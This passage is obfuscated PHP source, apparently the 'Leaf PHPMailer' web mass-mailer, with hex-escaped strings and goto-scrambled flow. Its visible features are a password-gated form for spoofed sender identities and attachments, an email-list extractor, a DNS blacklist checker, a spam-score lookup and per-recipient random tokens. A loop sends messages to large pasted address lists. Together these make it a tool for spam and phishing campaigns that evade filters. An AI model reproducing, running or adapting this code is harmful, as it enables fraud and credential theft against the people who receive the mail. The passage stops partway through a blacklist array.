f21N5: $mail->CharSet = $charset; goto Y0NON; dg4pm: $viewMessage = leafClear($viewMessage, "\x75\163\145\x72\100\144\157\x6d\x61\151\156\56\143\157\155"); goto k53cc; ioV_w: goto LMknI; goto J6mfk; Hl8OQ: JHACJ: goto r3dcQ; Xd0nv: exit; goto GijeA; XRoYz: print "\74\144\x69\x76\x20\143\154\141\163\163\x3d\x22\143\x6f\156\x74\x61\151\x6e\x65\162\x20\143\x6f\x6c\55\x6c\147\x2d\64\x22\76\x3c\x68\x33\76\74\146\x6f\x6e\x74\x20\x63\157\x6c\157\162\x3d\42\147\x72\145\x65\156\42\76\x3c\x73\x70\141\156\x20\x63\x6c\x61\x73\163\x3d\x22\x67\x6c\x79\160\x68\151\143\157\156\x20\147\154\171\x70\150\x69\143\x6f\156\55\x6c\145\x61\146\42\x3e\74\x2f\x73\x70\x61\x6e\x3e\x3c\57\146\x6f\156\164\x3e\40\x4c\145\x61\x66\40\x50\110\x50\115\141\x69\154\x65\162\x20\x3c\x73\x6d\141\x6c\x6c\x3e\x45\x6d\x61\151\154\x20\x46\x69\154\x74\145\162\x3c\57\x73\155\x61\x6c\x6c\x3e\x3c\57\150\63\x3e"; goto WBM_Z; osHF2: EVXFQ: goto YhuuI; CpHyi: $_SESSION[$sessioncode] = $password; goto DEb8B; CubC0: X1onj: goto anMmR; zMZ6K: iZ5Y2: goto nlzIg; W8n9c: print "\x3c\x70\x72\145\76" . htmlspecialchars($viewMessage) . "\74\x2f\x70\x72\145\x3e"; goto FckdL; kg5D3: $ch = curl_init(); goto u9mMd; tVWAa: if ($encoding == "\x62\141\163\x65\66\64") { goto JHACJ; } goto CAr7y; KPefm: if ($_POST["\141\x63\x74\x69\x6f\156"] == "\x73\143\x6f\162\145") { goto Gqzg1; } goto c0pgb; g_ZnK: $mail->Subject = leafClear($subject, $email); goto nmWs4; zj5Ot: print "\74\x64\x69\x76\x20\143\x6c\141\163\x73\75\x22\143\x6f\x6e\x74\x61\151\x6e\x65\162\x20\x63\x6f\x6c\x2d\154\147\x2d\66\x22\x3e\74\x68\63\76\74\x66\157\x6e\164\40\143\x6f\154\x6f\162\x3d\42\x67\162\145\x65\156\42\76\x3c\x73\x70\x61\156\40\143\x6c\141\x73\163\75\42\147\154\171\x70\x68\x69\143\x6f\x6e\x20\x67\x6c\x79\x70\x68\x69\143\157\x6e\x2d\154\x65\x61\x66\x22\x3e\74\57\x73\160\x61\156\x3e\x3c\x2f\146\x6f\x6e\164\x3e\40\x4c\x65\x61\x66\40\120\x48\x50\x4d\x61\x69\x6c\x65\x72\x20\x3c\x73\x6d\x61\154\154\x3e\102\154\x61\x63\153\154\x69\x73\164\x20\x43\x68\x65\x63\153\x65\162\74\57\163\155\x61\154\154\x3e\x3c\x2f\x68\x33\x3e"; goto M3Xj1; ZMpKO: $emailList = leafTrim($_POST["\145\155\x61\151\x6c\x4c\x69\x73\164"]); goto grYYS; f5lEY: $plain = "\143\x68\145\x63\x6b\145\144"; goto LeXpL; EnAQd: print "\74\164\141\142\154\145\x20\x3e"; goto lo09p; RWKHR: foreach ($matches[0] as $email) { print $email . "\xa"; dEpQC: } goto hZYLo; KYggQ: if (!isset($_GET["\143\150\145\143\153\x5f\151\x70"])) { goto quk7_; } goto jOrC_; Jegjh: curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array("\x65\x6d\x61\x69\x6c" => $messageHeaders, "\157\160\164\151\157\156\x73" => "\154\157\156\x67"))); goto YiNik; iJ5D3: print "\74\x64\x69\166\x20\x63\154\141\163\163\75\x22\x63\157\x6e\x74\x61\x69\x6e\145\x72\x20\143\157\x6c\x2d\x6c\x67\55\66\42\76\xd\xa\x20\x20\x20\40\x20\x20\x20\40\74\x68\x33\76\x3c\x66\x6f\x6e\x74\40\143\157\x6c\157\162\75\42\147\162\145\x65\x6e\x22\76\74\x73\160\x61\x6e\x20\143\154\141\163\x73\x3d\x22\x67\x6c\x79\160\150\151\143\x6f\x6e\x20\x67\x6c\171\x70\150\x69\x63\x6f\x6e\55\x6c\x65\141\146\42\76\74\57\163\x70\x61\x6e\76\x3c\x2f\146\x6f\x6e\x74\76\40\x4c\x65\141\146\40\x50\110\120\115\141\x69\154\x65\x72\x20\x3c\163\155\141\x6c\154\x3e" . $leaf["\x76\x65\x72\163\151\x6f\x6e"] . "\74\57\x73\155\141\154\x6c\x3e\x3c\57\150\x33\76\xd\xa\40\x20\x20\x20\40\40\x20\x20\x3c\146\157\162\x6d\x20\156\141\x6d\145\75\42\x66\x6f\x72\155\42\x20\x69\144\75\x22\x66\x6f\162\155\42\x20\155\145\x74\150\157\x64\75\x22\x50\x4f\123\124\x22\x20\145\x6e\143\164\171\x70\x65\75\x22\x6d\x75\x6c\x74\x69\x70\141\162\x74\x2f\x66\x6f\x72\x6d\55\x64\141\x74\x61\42\40\141\x63\x74\151\x6f\x6e\75\42\x22\76\15\12\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\x3c\x69\156\x70\x75\x74\x20\164\171\x70\145\x3d\42\150\x69\x64\144\x65\x6e\x22\40\x6e\141\155\145\75\x22\141\143\x74\x69\x6f\x6e\x22\40\x76\x61\154\x75\145\x3d\42\x73\143\157\162\145\x22\76\15\xa\15\xa\40\40\x20\x20\40\x20\40\40\40\40\x20\40\74\x64\x69\166\40\x63\x6c\141\163\x73\x3d\x22\162\x6f\x77\42\76\15\12\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\40\40\x20\74\x64\x69\x76\x20\143\154\141\x73\x73\x3d\x22\146\157\x72\x6d\55\147\162\157\165\x70\40\143\x6f\x6c\55\154\147\x2d\x36\x20\42\x3e\x3c\154\141\142\145\x6c\x20\x66\x6f\162\75\x22\163\145\x6e\x64\x65\x72\x45\x6d\141\x69\154\42\x3e\x45\155\x61\x69\154\x3c\57\x6c\141\x62\145\x6c\x3e\x3c\151\156\160\165\x74\40\x74\171\x70\x65\75\x22\164\145\x78\x74\x22\x20\143\x6c\141\163\x73\x3d\42\x66\x6f\x72\x6d\x2d\143\x6f\x6e\164\162\157\x6c\x20\40\151\x6e\x70\165\x74\x2d\163\x6d\x20\x22\40\151\144\x3d\42\x73\145\156\144\x65\x72\x45\155\x61\x69\154\42\x20\x6e\141\x6d\x65\75\42\163\x65\156\144\x65\x72\x45\155\x61\151\154\42\x20\166\141\154\165\145\75\42" . $senderEmail . "\x22\76\x3c\57\144\x69\x76\x3e\15\xa\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\x3c\x64\151\166\40\x63\x6c\x61\x73\x73\75\x22\x66\157\162\x6d\55\147\x72\157\x75\x70\40\x63\157\x6c\55\154\x67\x2d\x36\40\x22\76\74\154\141\142\x65\x6c\x20\146\157\162\75\42\x73\x65\x6e\144\145\x72\x4e\141\x6d\x65\x22\76\x53\145\x6e\144\145\162\x20\x4e\141\155\x65\x3c\x2f\x6c\x61\142\x65\x6c\x3e\x3c\151\156\160\x75\x74\40\164\171\160\145\x3d\x22\164\x65\170\x74\42\x20\x63\154\x61\163\x73\x3d\42\146\157\162\x6d\x2d\x63\x6f\x6e\x74\162\x6f\154\40\x20\151\x6e\x70\x75\164\55\163\x6d\40\x22\x20\x69\x64\x3d\42\x73\145\x6e\144\145\162\116\141\155\145\x22\40\x6e\141\155\145\75\42\163\145\x6e\x64\145\x72\x4e\141\155\x65\x22\40\x76\x61\154\165\145\75\x22" . $senderName . "\42\x3e\74\57\144\x69\x76\x3e\15\12\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\x3c\x2f\144\x69\166\76\xd\12\x20\40\40\40\40\40\x20\x20\40\40\40\x20\74\x64\151\x76\40\x63\154\x61\163\163\x3d\42\162\x6f\x77\x22\x3e\15\xa\40\40\40\x20\x20\40\40\x20\40\40\40\x20\40\x20\40\x20\74\x73\x70\x61\x6e\40\x63\154\141\x73\163\x3d\x22\x66\157\x72\155\55\x67\162\157\x75\x70\40\x63\157\154\55\x6c\147\55\x36\x20\40\x22\x3e\x3c\x6c\141\142\145\154\x20\146\157\x72\x3d\x22\141\x74\x74\141\143\150\155\x65\x6e\164\x22\76\101\164\164\x61\x63\150\x6d\145\x6e\x74\x20\74\163\155\141\x6c\154\76\50\115\x75\154\164\151\x70\154\x65\40\x41\166\x61\x69\154\x61\x62\x6c\x65\51\74\57\163\155\141\154\154\76\x3c\x2f\154\x61\x62\x65\154\x3e\x3c\x69\x6e\160\x75\x74\40\x74\x79\x70\x65\75\42\146\x69\154\x65\42\x20\156\x61\x6d\x65\75\x22\141\x74\164\x61\143\150\x6d\x65\156\x74\133\x5d\42\x20\x69\144\x3d\x22\141\164\164\x61\143\x68\155\145\156\x74\x5b\135\x22\40\x6d\165\154\164\x69\160\154\x65\x2f\76\x3c\x2f\163\x70\141\x6e\76\xd\12\15\xa\x20\x20\40\40\x20\x20\40\40\40\x20\40\40\40\x20\40\40\74\144\151\x76\x20\x63\154\141\163\163\75\x22\x66\x6f\162\155\55\147\x72\x6f\165\x70\40\143\x6f\x6c\x2d\154\147\55\66\42\x3e\x3c\154\141\142\145\154\x20\146\157\x72\75\x22\162\x65\160\x6c\x79\124\x6f\42\76\x52\x65\160\154\171\55\164\x6f\74\x2f\154\x61\142\x65\x6c\x3e\74\151\156\160\x75\164\x20\164\x79\160\x65\75\42\164\145\170\x74\x22\40\143\x6c\141\163\x73\75\x22\146\x6f\162\155\x2d\x63\x6f\156\x74\162\x6f\154\40\x20\151\x6e\160\165\164\55\x73\155\40\x22\40\x69\144\x3d\x22\x72\x65\x70\x6c\171\124\157\42\40\x6e\141\x6d\x65\75\x22\x72\145\x70\x6c\x79\x54\157\x22\x20\166\141\x6c\x75\145\x3d\42" . $replyTo . "\42\40\x2f\x3e\74\57\144\151\166\76\xd\12\x20\40\40\40\x20\40\40\x20\x20\x20\x20\x20\74\x2f\x64\x69\166\x3e\xd\12\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x3c\144\x69\166\40\143\x6c\x61\x73\x73\x3d\42\x72\157\x77\x22\76\15\xa\x20\40\40\40\40\x20\40\x20\x20\40\40\40\40\x20\40\x20\74\144\x69\x76\x20\x63\x6c\x61\163\163\75\42\x66\157\x72\155\x2d\x67\162\157\x75\x70\40\x63\x6f\154\55\154\147\x2d\x31\62\40\x22\76\x3c\x6c\141\x62\x65\x6c\x20\x66\x6f\162\x3d\42\x73\x75\142\152\145\143\x74\x22\76\x53\x75\x62\x6a\145\x63\164\74\x2f\154\141\x62\x65\154\76\74\x69\x6e\160\x75\x74\x20\x74\171\160\x65\x3d\x22\164\x65\x78\x74\42\40\x63\154\141\163\x73\75\42\146\x6f\x72\155\55\x63\157\156\x74\162\x6f\x6c\40\40\151\x6e\x70\165\164\x2d\x73\x6d\40\42\x20\151\x64\75\42\163\165\142\152\145\143\164\x22\40\156\141\155\145\x3d\42\163\165\x62\x6a\x65\x63\x74\x22\x20\166\x61\x6c\165\x65\75\42" . $subject . "\42\40\57\76\x3c\x2f\144\x69\x76\x3e\xd\xa\40\40\40\x20\x20\40\x20\40\40\x20\40\40\x3c\57\144\151\x76\x3e\xd\12\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x3c\x64\151\166\40\143\154\141\163\x73\75\42\x72\x6f\x77\x22\76\15\xa\40\40\x20\40\40\x20\x20\40\40\40\40\40\40\x20\x20\40\74\144\151\x76\x20\x63\x6c\141\x73\163\75\42\146\x6f\x72\155\55\x67\162\x6f\x75\x70\x20\143\x6f\154\x2d\154\x67\x2d\66\x22\76\x3c\x6c\141\142\145\x6c\40\146\157\x72\x3d\x22\x6d\145\163\x73\x61\x67\x65\114\x65\164\x74\145\x72\x22\x3e\x4d\145\163\163\141\x67\145\x20\x4c\x65\x74\164\x65\x72\x20\x3c\142\x75\x74\164\x6f\156\x20\164\171\x70\x65\75\42\x73\165\142\x6d\151\164\x22\x20\143\x6c\x61\163\x73\75\42\x62\x74\x6e\x20\x62\164\x6e\55\144\145\146\141\x75\x6c\164\40\142\x74\156\x2d\170\x73\x22\40\146\157\162\155\x3d\42\146\x6f\x72\x6d\42\40\x6e\141\x6d\x65\75\x22\x61\x63\164\x69\157\156\42\40\166\x61\154\x75\145\75\x22\166\x69\x65\167\x22\40\x66\157\162\155\x74\141\x72\x67\x65\164\x3d\42\x5f\142\x6c\141\x6e\x6b\42\76\120\162\x65\x76\x69\x65\167\x20\74\x2f\x62\x75\164\164\x6f\156\76\x3c\x2f\x6c\x61\142\145\154\76\x3c\x74\x65\170\x74\x61\162\145\x61\40\x6e\x61\155\145\75\42\x6d\145\163\163\x61\x67\x65\114\145\164\164\x65\x72\42\40\x69\x64\x3d\42\x6d\145\x73\x73\141\x67\x65\114\x65\164\x74\145\x72\42\40\143\x6c\x61\163\163\75\42\146\x6f\x72\x6d\x2d\143\x6f\156\164\162\157\154\42\40\162\157\x77\x73\75\x22\61\x30\x22\40\151\x64\x3d\42\164\145\170\164\101\x72\x65\141\x22\x3e" . $messageLetter . "\x3c\x2f\164\145\x78\x74\141\x72\145\141\76\74\57\x64\x69\x76\x3e\xd\xa\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\x3c\x64\151\166\40\143\154\141\x73\x73\x3d\x22\x66\x6f\x72\155\x2d\147\162\157\165\160\x20\143\157\x6c\55\x6c\147\x2d\66\x20\42\x3e\74\154\x61\142\145\x6c\x20\146\x6f\x72\x3d\42\145\155\x61\151\x6c\114\151\x73\x74\42\x3e\105\155\141\x69\154\x20\114\151\163\x74\x20\x3c\x61\40\x68\162\145\x66\x3d\42\x3f\x65\x6d\x61\x69\154\146\x69\154\164\145\162\75\157\x6e\42\x20\x74\141\162\147\x65\x74\75\x22\x5f\142\x6c\x61\156\153\42\40\x63\154\x61\x73\163\75\42\142\164\156\x20\x62\164\156\55\x64\x65\x66\x61\x75\154\164\40\142\164\x6e\x2d\170\163\x22\x3e\x46\x69\154\164\145\x72\x2f\105\x78\164\x72\x61\x63\x74\x3c\x2f\x61\76\x3c\57\x6c\141\142\x65\154\76\74\x74\x65\170\164\141\x72\x65\x61\x20\x6e\x61\155\145\75\x22\x65\x6d\x61\x69\154\x4c\151\163\x74\42\x20\x69\x64\x3d\42\145\x6d\141\x69\x6c\114\x69\x73\x74\42\40\143\154\x61\163\x73\x3d\42\x66\157\x72\155\x2d\143\157\156\164\x72\157\x6c\x22\40\162\x6f\167\163\x3d\x22\x31\60\42\40\151\x64\75\x22\164\x65\170\x74\101\x72\x65\141\42\76" . $emailList . "\x3c\x2f\164\145\x78\x74\141\x72\145\141\x3e\74\x2f\144\151\x76\76\15\xa\40\x20\40\40\40\x20\x20\x20\40\x20\x20\x20\74\x2f\x64\151\166\x3e\15\12\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x3c\x64\151\166\40\143\x6c\x61\x73\163\75\x22\x72\157\x77\x22\x3e\xd\xa\40\40\40\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x3c\x64\151\x76\40\x63\x6c\x61\x73\x73\x3d\x22\x66\x6f\162\155\x2d\x67\x72\x6f\165\160\40\143\x6f\154\55\x6c\x67\x2d\x36\40\42\76\15\xa\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\74\x6c\x61\x62\145\x6c\x20\x66\157\162\75\x22\155\x65\163\163\x61\x67\145\x54\171\x70\145\42\76\115\x65\x73\x73\141\147\145\x20\124\171\160\145\74\x2f\154\x61\142\x65\x6c\76\xd\xa\40\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x48\x54\x4d\x4c\40\74\x69\156\160\165\x74\x20\x74\x79\160\x65\75\42\x72\x61\144\x69\x6f\x22\x20\x6e\x61\155\145\x3d\42\155\145\x73\x73\x61\x67\145\124\x79\x70\x65\42\x20\x69\144\x3d\x22\155\x65\163\x73\141\x67\145\x54\171\x70\145\x22\x20\166\141\x6c\165\145\75\x22\61\x22\x20" . $html . "\76\xd\xa\x20\40\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\x20\x20\40\120\154\x61\x69\156\74\x69\156\x70\165\x74\x20\x74\171\160\x65\x3d\42\x72\141\x64\151\157\42\40\156\141\x6d\x65\75\x22\155\x65\x73\163\141\147\145\x54\x79\160\145\x22\x20\x69\144\75\42\x6d\x65\x73\163\141\x67\x65\124\x79\160\x65\42\x20\x76\x61\x6c\165\145\75\x22\x32\x22\40" . $plain . "\76\15\xa\x20\40\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x3c\57\x64\x69\166\76\xd\12\40\40\x20\x20\40\40\40\40\x20\40\40\x20\x20\x20\40\x20\x3c\144\151\x76\x20\143\x6c\141\163\x73\x3d\42\x66\157\x72\155\55\147\x72\157\x75\160\x20\x63\x6f\x6c\x2d\x6c\147\55\63\x20\42\x3e\15\xa\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x3c\x6c\141\x62\x65\154\x20\146\x6f\162\75\x22\x63\150\x61\x72\163\x65\164\x22\76\x43\x68\141\162\x61\x63\x74\145\x72\x20\163\x65\164\x3c\57\x6c\x61\142\145\154\x3e\xd\xa\x20\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\x20\40\40\40\74\x73\x65\x6c\x65\143\164\x20\143\x6c\141\163\163\75\x22\x66\x6f\x72\155\x2d\x63\157\156\164\x72\x6f\154\40\151\x6e\160\165\x74\x2d\x73\x6d\42\40\151\144\x3d\42\143\x68\x61\x72\163\x65\164\42\40\x6e\x61\x6d\145\75\x22\x63\x68\141\x72\163\145\164\x22\x3e\xd\xa\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\40\x20\x3c\x6f\160\x74\x69\x6f\156\40" . $utf8 . "\76\x55\x54\x46\55\70\74\57\x6f\x70\x74\x69\x6f\156\x3e\15\12\40\40\40\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40\74\157\x70\164\x69\x6f\156\x20" . $iso . "\76\x49\123\117\x2d\x38\70\65\71\55\61\74\x2f\157\x70\x74\x69\x6f\x6e\x3e\xd\xa\40\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\74\x2f\163\x65\x6c\145\143\x74\x3e\xd\12\x20\40\x20\40\40\x20\40\x20\40\40\40\40\40\x20\40\40\x3c\57\x64\151\x76\76\xd\12\x20\40\40\x20\40\40\40\40\x20\40\40\40\40\40\x20\40\x3c\x64\151\166\40\x63\x6c\141\163\x73\x3d\42\x66\x6f\162\155\x2d\x67\162\157\x75\160\40\143\157\x6c\x2d\154\x67\55\63\40\x22\x3e\xd\xa\40\x20\40\x20\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\40\x20\74\154\x61\x62\145\x6c\x20\x66\x6f\x72\x3d\x22\145\156\143\157\x64\x69\x6e\147\x22\x3e\x4d\x65\x73\163\141\147\x65\40\145\156\x63\157\x64\151\156\147\74\x2f\x6c\x61\x62\145\x6c\x3e\xd\xa\40\x20\x20\40\40\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\40\40\x3c\x73\x65\x6c\x65\x63\x74\x20\143\154\141\163\x73\x3d\42\146\157\162\x6d\x2d\143\x6f\x6e\x74\162\x6f\154\x20\151\x6e\x70\165\164\x2d\x73\x6d\x22\40\151\x64\x3d\x22\145\x6e\x63\157\x64\145\x22\x20\156\x61\155\x65\75\42\145\x6e\143\x6f\x64\x65\x22\x3e\15\xa\x20\x20\40\40\40\40\40\x20\x20\x20\x20\x20\40\40\40\x20\40\40\40\40\40\x20\40\x20\x3c\x6f\160\164\x69\x6f\156\x20" . $bit8 . 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"\x29\x3c\x2f\x6c\151\x3e\xd\xa\40\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\x20\xd\12\40\40\40\40\x20\x20\40\40\40\x20\40\40\x20\40\x20\x20\74\x6c\x69\76\133\55\162\x61\x6e\144\x6f\x6d\163\x74\x72\151\156\x67\55\x5d\40\x3a\x20\74\x62\x3e\x52\141\156\x64\x6f\x6d\40\163\x74\x72\x69\156\x67\40\x28\60\x2d\x39\x2c\141\x2d\x7a\x29\x3c\57\142\x3e\x3c\57\x6c\x69\x3e\15\xa\40\40\40\x20\40\x20\40\40\40\40\40\40\x20\40\40\x20\x3c\154\151\76\133\x2d\x72\141\156\144\157\155\156\x75\155\x62\145\x72\55\135\x20\72\40\x3c\x62\x3e\x52\x61\x6e\x64\157\155\40\156\165\155\142\145\x72\x20\x28\x30\x2d\71\51\x20\x3c\57\142\76\74\57\154\151\x3e\xd\xa\x20\x20\40\x20\x20\40\40\40\40\x20\x20\40\40\40\x20\40\x3c\154\151\x3e\x5b\x2d\x72\x61\x6e\144\x6f\155\x6c\145\x74\x74\x65\x72\x73\x2d\135\40\x3a\40\74\142\76\x52\x61\x6e\144\x6f\155\40\x4c\x65\x74\x74\x65\x72\x73\x28\141\x2d\172\51\x20\74\57\142\x3e\x3c\57\x6c\151\76\15\12\x20\x20\40\40\40\x20\40\40\x20\40\x20\40\40\x20\x20\x20\x3c\154\151\x3e\133\x2d\162\141\156\x64\157\x6d\155\144\65\x2d\x5d\40\x3a\40\74\x62\x3e\x52\141\x6e\x64\x6f\x6d\40\115\x44\65\40\74\x2f\x62\76\74\x2f\x6c\x69\x3e\15\12\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\74\57\x75\154\x3e\xd\12\x20\40\40\x20\x20\40\40\x20\40\40\x20\40\x3c\150\64\x3e\145\170\x61\155\x70\154\145\74\x2f\150\64\76\15\12\x20\x20\40\40\40\40\40\x20\40\x20\40\x20\x52\x65\x63\145\x69\166\145\162\x20\x45\x6d\x61\151\154\x20\x3d\x20\74\142\x3e\165\x73\145\162\100\144\157\x6d\x61\x69\156\56\x63\157\x6d\74\x2f\142\x3e\x3c\x62\x72\76\xd\12\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\74\165\x6c\76\xd\12\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\x3c\x6c\x69\76\150\145\x6c\154\157\x20\74\142\76\133\55\x65\155\x61\x69\154\x75\163\145\162\x2d\135\x3c\57\x62\x3e\40\x3d\40\150\145\x6c\x6c\x6f\x20\74\x62\76\165\163\145\162\x3c\57\142\76\74\x2f\154\x69\76\xd\12\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\x3c\x6c\151\76\x79\x6f\165\x72\40\144\157\x6d\141\x69\x6e\40\x69\163\40\x3c\x62\76\x5b\55\145\x6d\x61\151\x6c\144\157\x6d\x61\x69\x6e\x2d\135\x3c\57\142\76\x20\x3d\x20\131\x6f\x75\162\x20\x44\x6f\x6d\141\x69\156\40\x69\163\x20\x3c\x62\76\144\157\155\x61\x69\156\x2e\x63\x6f\155\x3c\x2f\x62\76\74\57\154\x69\x3e\15\xa\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\40\x3c\x6c\151\76\x79\x6f\x75\x72\40\143\157\x64\145\40\151\x73\40\x20\x3c\x62\x3e\133\x2d\x72\141\x6e\144\x6f\x6d\x6d\x64\65\55\135\x3c\57\x62\x3e\40\75\40\171\x6f\165\162\40\x63\x6f\144\145\40\x69\x73\x20\74\x62\76\x65\x31\60\x61\x64\143\63\71\64\x39\x62\141\x35\x39\x61\142\142\145\x35\66\x65\60\x35\x37\x66\x32\x30\146\x38\70\63\145\74\x2f\x62\x3e\x3c\x2f\x6c\x69\x3e\15\xa\40\x20\40\40\x20\x20\40\40\40\x20\40\40\x3c\x2f\x75\154\76\15\12\xd\xa\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\x3c\150\x36\76\142\171\40\74\142\x3e\74\141\x20\150\162\x65\146\75\x22\150\164\x74\160\x3a\x2f\57" . $leaf["\167\x65\x62\x73\151\x74\x65"] . "\x22\x3e" . $leaf["\x77\145\142\x73\151\164\145"] . "\74\57\141\76\74\57\x62\76\x3c\57\150\66\76\xd\xa\x20\40\x20\40\x20\40\40\40\x3c\57\144\151\x76\76\15\xa\40\x20\40\40\74\57\x64\151\x76\76"; goto nuHAI; Pb7sf: goto jVDBU; goto UfhM7; nmWs4: $mail->Body = leafClear($messageLetter, $email); goto KekMo; g0gp9: Q3csu: goto qzWnC; f569P: header("\103\x6f\x6e\x74\145\156\164\x2d\x44\x65\163\x63\x72\151\x70\164\x69\157\x6e\x3a\40\x46\x69\x6c\x65\x20\x54\162\141\156\163\x66\145\162"); goto aoeQA; XMnJX: rlw_d: goto CpHyi; ekoH8: foreach ($maillist as $email) { goto h_zH7; rsmru: $x++; goto zdKnB; NPmzp: H6VUm: goto cp6Ls; DIjYl: $i = 0; goto NPmzp; zrV4V: $mail->addAddress($email); goto ydnQT; S78Mt: lQeh3: goto vZHcl; S0KgG: $mail->Encoding = $encoding; goto DIjYl; l0ncH: Zve8_: goto P6z43; E1DAo: wZZkE: goto SMOzB; f7jHQ: echo "\74\x64\x69\166\40\x63\154\x61\163\163\75\x22\x63\x6f\x6c\x2d\154\x67\55\x36\x22\76\x3c\x73\x70\x61\156\x20\x63\154\x61\x73\x73\75\42\154\141\x62\145\x6c\x20\x6c\141\x62\145\154\55\163\165\143\x63\145\x73\x73\42\x3e\117\153\74\x2f\x73\160\x61\x6e\x3e\74\57\144\151\166\76"; goto KmnqO; DfqHk: $mail->AltBody = strip_tags(leafClear($messageLetter, $email)); goto kRI_m; vJszp: goto i4jUc; goto cfvyO; sv3xn: MOfz0: goto qqltQ; QesJr: goto H6VUm; goto l0ncH; cv4I1: $mail->Body = leafClear($messageLetter, $email); goto zMLxi; XkilY: $mail->AddAttachment($_FILES["\x61\x74\164\x61\143\150\x6d\145\156\x74"]["\164\x6d\x70\x5f\x6e\141\155\x65"][$i], $_FILES["\x61\x74\x74\x61\143\150\155\145\x6e\164"]["\x6e\141\x6d\x65"][$i]); goto HvIbR; V2HP0: print "\74\x64\151\166\40\x63\x6c\x61\x73\x73\x3d\42\x63\x6f\154\55\154\x67\55\66\x22\76\x3c\x73\160\x61\x6e\40\143\x6c\x61\163\163\x3d\42\154\x61\142\x65\154\x20\154\141\x62\145\154\55\144\145\x66\141\x75\x6c\x74\42\x3e\x49\x6e\x63\x6f\162\x72\x65\x63\x74\40\105\155\x61\x69\154\74\x2f\x73\x70\x61\156\76\74\x2f\x64\151\166\x3e"; goto Ii0dl; MWEly: if (!($_FILES["\x61\x74\x74\x61\143\x68\x6d\145\x6e\164"]["\x74\x6d\160\x5f\156\x61\155\x65"][$i] != '')) { goto i4NRa; } goto XkilY; cfvyO: IxGyW: goto GUDo3; W5Te7: cCNlL: goto x10so; wnYAQ: if (!leafMailCheck($email)) { goto FgFX3; } goto fJ7NC; qqltQ: echo "\74\x64\151\166\40\143\154\141\x73\163\75\42\x63\157\154\55\x6c\147\55\x36\42\76\x3c\163\160\141\x6e\40\x63\x6c\141\x73\x73\75\x22\x6c\141\x62\145\154\x20\154\x61\x62\145\x6c\x2d\x64\145\x66\x61\x75\x6c\x74\x22\76" . htmlspecialchars($mail->ErrorInfo) . "\x3c\57\x73\160\141\156\76\x3c\x2f\144\x69\166\x3e"; goto S78Mt; QKzxL: goto sFvXA; goto cxlEw; vZHcl: print "\74\x62\x72\x3e\15\12"; goto Sytsz; zdKnB: $k = 0; goto fwZGT; fwZGT: sFvXA: goto uj3N1; Sytsz: goto FON2l; goto nSfGA; ydnQT: $mail->Subject = leafClear($subject, $email); goto cv4I1; cp6Ls: if (!($i < count($_FILES["\x61\164\x74\141\x63\x68\x6d\x65\x6e\x74"]["\156\x61\155\145"]))) { goto Zve8_; } goto MWEly; h_zH7: print "\74\144\151\166\x20\x63\154\141\163\163\75\x22\x63\157\154\55\x6c\147\55\61\x22\x3e\133" . $x . "\x2f" . $n . "\135\x3c\x2f\144\151\166\x3e\74\x64\x69\166\x20\x63\x6c\141\163\163\x3d\42\x63\157\x6c\55\x6c\x67\x2d\64\42\76" . $email . "\74\x2f\x64\151\166\x3e"; goto wnYAQ; YAbR2: FON2l: goto rsmru; fJ7NC: $mail = new PHPMailer(); goto rYvBe; BcyOh: echo "\40"; goto W5Te7; uj3N1: if (!($k < 40000)) { goto Z_Qcn; } goto BcyOh; GUDo3: $mail->IsHTML(true); goto DfqHk; nSfGA: FgFX3: goto V2HP0; wqTRC: QktpC: goto X1gKo; kRI_m: i4jUc: goto z8uwE; KmnqO: goto lQeh3; goto sv3xn; zMLxi: if ($messageType == 1) { goto IxGyW; } goto kWrY0; cxlEw: Z_Qcn: goto wqTRC; HvIbR: i4NRa: goto E1DAo; kWrY0: $mail->IsHTML(false); goto vJszp; P6z43: if (!$mail->send()) { goto MOfz0; } goto f7jHQ; SMOzB: $i++; goto QesJr; rYvBe: $mail->setFrom(leafClear($senderEmail, $email), leafClear($senderName, $email)); goto Dc0k5; Ii0dl: print "\x3c\x62\162\76\15\xa"; goto YAbR2; z8uwE: $mail->CharSet = $charset; goto S0KgG; x10so: $k++; goto QKzxL; Dc0k5: $mail->addReplyTo(leafClear($replyTo, $email)); goto zrV4V; X1gKo: } goto nlt3S; oSMBb: print "\x3c\x62\157\x64\x79\76"; goto iJ5D3; w1NoT: goto H2Vvr; goto JENQm; hGQDj: goto Ozl1_; goto XMnJX; VOftw: $senderEmail = ''; goto mOjXb; f0dGM: MM5a6: goto Oh1mF; yx6Cn: $dnsbl_lookup = ["\141\154\154\x2e\163\x35\150\56\156\145\164", 